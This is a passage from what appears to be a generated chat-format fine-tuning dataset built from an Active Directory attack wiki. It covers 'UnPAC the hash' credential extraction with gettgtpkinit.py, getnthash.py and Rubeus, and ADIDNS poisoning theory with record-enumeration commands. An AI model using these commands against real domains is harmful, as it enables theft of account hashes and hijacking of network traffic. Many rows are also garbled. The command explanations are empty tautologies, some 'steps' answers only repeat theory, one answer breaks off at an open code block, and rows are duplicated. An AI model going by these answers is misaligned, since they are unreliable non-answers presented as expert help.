\"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 763, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "gettgtpkinit.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for UnPAC the hash - Practice?"}, {"role": "assistant", "content": "gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for UnPAC the hash - Practice?", "response": "gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"", "metadata": {"corpus_index": 763, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"`?"}, {"role": "assistant", "content": "This command is used for unpac the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `gettgtpkinit.py -cert-pfx \"PATH_TO_CERTIFICATE\" -pfx-pass \"CERTIFICATE_PASSWORD\" \"FQDN_DOMAIN/TARGET_SAMNAME\" \"TGT_CCACHE_FILE\"`?", "response": "This command is used for unpac the hash - practice. Practice", "metadata": {"corpus_index": 763, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use export for unpac the hash - practice?"}, {"role": "assistant", "content": "export KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use export for unpac the hash - practice?", "response": "export KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'", "metadata": {"corpus_index": 764, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "export"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for UnPAC the hash - Practice?"}, {"role": "assistant", "content": "export KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for UnPAC the hash - Practice?", "response": "export KRB5CCNAME=\"TGT_CCACHE_FILE\"\ngetnthash.py -key 'AS-REP encryption key' 'FQDN_DOMAIN'/'TARGET_SAMNAME'", "metadata": {"corpus_index": 764, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `export KRB5CCNAME=\"TGT_CCACHE_FILE\"`?"}, {"role": "assistant", "content": "This command is used for unpac the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `export KRB5CCNAME=\"TGT_CCACHE_FILE\"`?", "response": "This command is used for unpac the hash - practice. Practice", "metadata": {"corpus_index": 764, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Rubeus.exe command to unpac the hash - practice"}, {"role": "assistant", "content": "Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Rubeus.exe command to unpac the hash - practice", "response": "Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show", "metadata": {"corpus_index": 765, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out UnPAC the hash - Practice during a pentest?"}, {"role": "assistant", "content": "Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out UnPAC the hash - Practice during a pentest?", "response": "Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show", "metadata": {"corpus_index": 765, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show`?"}, {"role": "assistant", "content": "This command is used for unpac the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe asktgt /getcredentials /user:\"TARGET_SAMNAME\" /certificate:\"BASE64_CERTIFICATE\" /password:\"CERTIFICATE_PASSWORD\" /domain:\"FQDN_DOMAIN\" /dc:\"DOMAIN_CONTROLLER\" /show`?", "response": "This command is used for unpac the hash - practice. Practice", "metadata": {"corpus_index": 765, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/unpac-the-hash.md", "page_title": "UnPAC the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ADIDNS poisoning - Theory"}, {"role": "assistant", "content": "In order to function properly, Active Directory services need DNS. In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records. This is called Active Directory Integrated DNS (ADIDNS).\n\nJust like any other domain name resolution spoofing attack, if an attacker is able to resolve requests with an arbitrary IP address, traffic gets hijacked, the attacker becomes a Man-in-the-Middle and further attacks can be operated.\n\nSince ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic.\n\nADIDNS zones can be remotely edited\n\n* with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don't exist, and they will have full control over it. By default, users that don't own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).\n* by using LDAP to create dnsNode objects. While dynamic updates can't be used to inject a wildcard DNS record, LDAP can be (only if the record doesn't already exist, which is the case by default)."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ADIDNS poisoning - Theory", "response": "In order to function properly, Active Directory services need DNS. In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records. This is called Active Directory Integrated DNS (ADIDNS).\n\nJust like any other domain name resolution spoofing attack, if an attacker is able to resolve requests with an arbitrary IP address, traffic gets hijacked, the attacker becomes a Man-in-the-Middle and further attacks can be operated.\n\nSince ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic.\n\nADIDNS zones can be remotely edited\n\n* with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don't exist, and they will have full control over it. By default, users that don't own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).\n* by using LDAP to create dnsNode objects. While dynamic updates can't be used to inject a wildcard DNS record, LDAP can be (only if the record doesn't already exist, which is the case by default).", "metadata": {"corpus_index": 766, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ADIDNS poisoning - Theory during a pentest?"}, {"role": "assistant", "content": "In order to function properly, Active Directory services need DNS. In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records. This is called Active Directory Integrated DNS (ADIDNS).\n\nJust like any other domain name resolution spoofing attack, if an attacker is able to resolve requests with an arbitrary IP address, traffic gets hijacked, the attacker becomes a Man-in-the-Middle and further attacks can be operated.\n\nSince ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic.\n\nADIDNS zones can be remotely edited\n\n* with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don't exist, and they will have full control over it. By default, users that don't own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).\n* by using LDAP to create dnsNode objects. While dynamic updates can't be used to inject a wildcard DNS record, LDAP can be (only if the record doesn't already exist, which is the case by default)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ADIDNS poisoning - Theory during a pentest?", "response": "In order to function properly, Active Directory services need DNS. In that matter, Active Directory Domain Services (AD-DS) offer an integrated storage and replication service for DNS records. This is called Active Directory Integrated DNS (ADIDNS).\n\nJust like any other domain name resolution spoofing attack, if an attacker is able to resolve requests with an arbitrary IP address, traffic gets hijacked, the attacker becomes a Man-in-the-Middle and further attacks can be operated.\n\nSince ADIDNS zone DACL (Discretionary Access Control List) enables regular users to create child objects by default, attackers can leverage that and hijack traffic.\n\nADIDNS zones can be remotely edited\n\n* with dynamic updates (a DNS specific protocol used by machine accounts to add and update their own DNS records). Users can create records if they don't exist, and they will have full control over it. By default, users that don't own a record will not be able to edit it, or to add another one with the same name, even if the type is different (A, AAAA, CNAME, MX, and so on).\n* by using LDAP to create dnsNode objects. While dynamic updates can't be used to inject a wildcard DNS record, LDAP can be (only if the record doesn't already exist, which is the case by default).", "metadata": {"corpus_index": 766, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe ADIDNS poisoning - Wildcard records & WINS in the context of penetration testing"}, {"role": "assistant", "content": "> Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. (source)\n\n:bulb: In some scenarios, adding a wildcard record to the proper ADIDNS zone won't work. This is usually due to the WINS forward lookup being enabled on that zone. WINS forward lookup makes the DNS server send a NBT-NS Query Request to a predefined WINS server when it receives an address record query for which it doesn't know the answer. In short, it serves the same purpose as the wildcard record. This feature needs to be disabled for the wildcard record to be used.\n\n!Domain Controller > DNS Manager > zone properties > WINS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe ADIDNS poisoning - Wildcard records & WINS in the context of penetration testing", "response": "> Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. (source)\n\n:bulb: In some scenarios, adding a wildcard record to the proper ADIDNS zone won't work. This is usually due to the WINS forward lookup being enabled on that zone. WINS forward lookup makes the DNS server send a NBT-NS Query Request to a predefined WINS server when it receives an address record query for which it doesn't know the answer. In short, it serves the same purpose as the wildcard record. This feature needs to be disabled for the wildcard record to be used.\n\n!Domain Controller > DNS Manager > zone properties > WINS", "metadata": {"corpus_index": 767, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ADIDNS poisoning - Wildcard records & WINS"}, {"role": "assistant", "content": "> Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. (source)\n\n:bulb: In some scenarios, adding a wildcard record to the proper ADIDNS zone won't work. This is usually due to the WINS forward lookup being enabled on that zone. WINS forward lookup makes the DNS server send a NBT-NS Query Request to a predefined WINS server when it receives an address record query for which it doesn't know the answer. In short, it serves the same purpose as the wildcard record. This feature needs to be disabled for the wildcard record to be used.\n\n!Domain Controller > DNS Manager > zone properties > WINS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ADIDNS poisoning - Wildcard records & WINS", "response": "> Wildcard records allow DNS to function in a very similar fashion to LLMNR/NBNS spoofing. Once you create a wildcard record, the DNS server will use the record to answer name requests that do not explicitly match records contained in the zone. (source)\n\n:bulb: In some scenarios, adding a wildcard record to the proper ADIDNS zone won't work. This is usually due to the WINS forward lookup being enabled on that zone. WINS forward lookup makes the DNS server send a NBT-NS Query Request to a predefined WINS server when it receives an address record query for which it doesn't know the answer. In short, it serves the same purpose as the wildcard record. This feature needs to be disabled for the wildcard record to be used.\n\n!Domain Controller > DNS Manager > zone properties > WINS", "metadata": {"corpus_index": 767, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of ADIDNS poisoning - WINS forward lookup"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n``bash\ndnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'\n`\n\n=== Windows\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n`powershell\nGet-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of ADIDNS poisoning - WINS forward lookup", "response": "::: tabs\n\n=== UNIX-like\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n``bash\ndnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'\n`\n\n=== Windows\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n`powershell\nGet-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"\n``\n\n:::", "metadata": {"corpus_index": 768, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for ADIDNS poisoning - WINS forward lookup"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n``bash\ndnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'\n`\n\n=== Windows\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n`powershell\nGet-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for ADIDNS poisoning - WINS forward lookup", "response": "::: tabs\n\n=== UNIX-like\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n``bash\ndnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'\n`\n\n=== Windows\n\nThe state of WINS forward lookup can be enumerated with dnstool.py (Python). The entry type 65281 (i.e. \"WINS\") will exist if WINS forward lookup is enabled.\n\n`powershell\nGet-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"\n``\n\n:::", "metadata": {"corpus_index": 768, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the dnstool.py command for adidns poisoning - wins forward lookup"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the dnstool.py command for adidns poisoning - wins forward lookup", "response": "dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'", "metadata": {"corpus_index": 769, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "dnstool.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ADIDNS poisoning - WINS forward lookup during a pentest?"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ADIDNS poisoning - WINS forward lookup during a pentest?", "response": "dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'", "metadata": {"corpus_index": 769, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'`?"}, {"role": "assistant", "content": "This command is used for adidns poisoning - wins forward lookup. WINS forward lookup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `dnstool.py -u 'DOMAIN\\USER' -p 'PASSWORD' --record '@' --action 'query' 'DomainController'`?", "response": "This command is used for adidns poisoning - wins forward lookup. WINS forward lookup", "metadata": {"corpus_index": 769, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Get-DNSServerResourceRecord for adidns poisoning - wins forward lookup?"}, {"role": "assistant", "content": "Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Get-DNSServerResourceRecord for adidns poisoning - wins forward lookup?", "response": "Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"", "metadata": {"corpus_index": 770, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Get-DNSServerResourceRecord"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out ADIDNS poisoning - WINS forward lookup during a pentest?"}, {"role": "assistant", "content": "Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out ADIDNS poisoning - WINS forward lookup during a pentest?", "response": "Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"", "metadata": {"corpus_index": 770, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"`?"}, {"role": "assistant", "content": "This command is used for adidns poisoning - wins forward lookup. WINS forward lookup"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Get-DNSServerResourceRecord -ZoneName \"DOMAIN.FQDN\" -RRType \"WINS\"`?", "response": "This command is used for adidns poisoning - wins forward lookup. WINS forward lookup", "metadata": {"corpus_index": 770, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about ADIDNS poisoning - Manual record manipulation"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nAn awesome Python alternative to Powermad's functions is dnstool. Theoretically, this script can be used to add, modify, query, remove, resurrect and ldapdelete records in ADIDNS.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about ADIDNS poisoning - Manual record manipulation", "response": "::: tabs\n\n=== UNIX-like\n\nAn awesome Python alternative to Powermad's functions is dnstool. Theoretically, this script can be used to add, modify, query, remove, resurrect and ldapdelete records in ADIDNS.\n\n```bash", "metadata": {"corpus_index": 771, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do ADIDNS poisoning - Manual record manipulation"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nAn awesome Python alternative to Powermad's functions is dnstool. Theoretically, this script can be used to add, modify, query, remove, resurrect and ldapdelete records in ADIDNS.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do ADIDNS poisoning - Manual record manipulation", "response": "::: tabs\n\n=== UNIX-like\n\nAn awesome Python alternative to Powermad's functions is dnstool. Theoretically, this script can be used to add, modify, query, remove, resurrect and ldapdelete records in ADIDNS.\n\n```bash", "metadata": {"corpus_index": 771, "category": "active_directory", "source_file": "docs/src/ad/movement/mitm-and-coerced-authentications/adidns-spoofing.md", "page_title": "ADIDNS poisoning", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of query a node"}, {"role": "assistant", "content": "dnstool.py -u 'DOMAIN\\user' -p 'password' --record '*' --action query $DomainController"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and 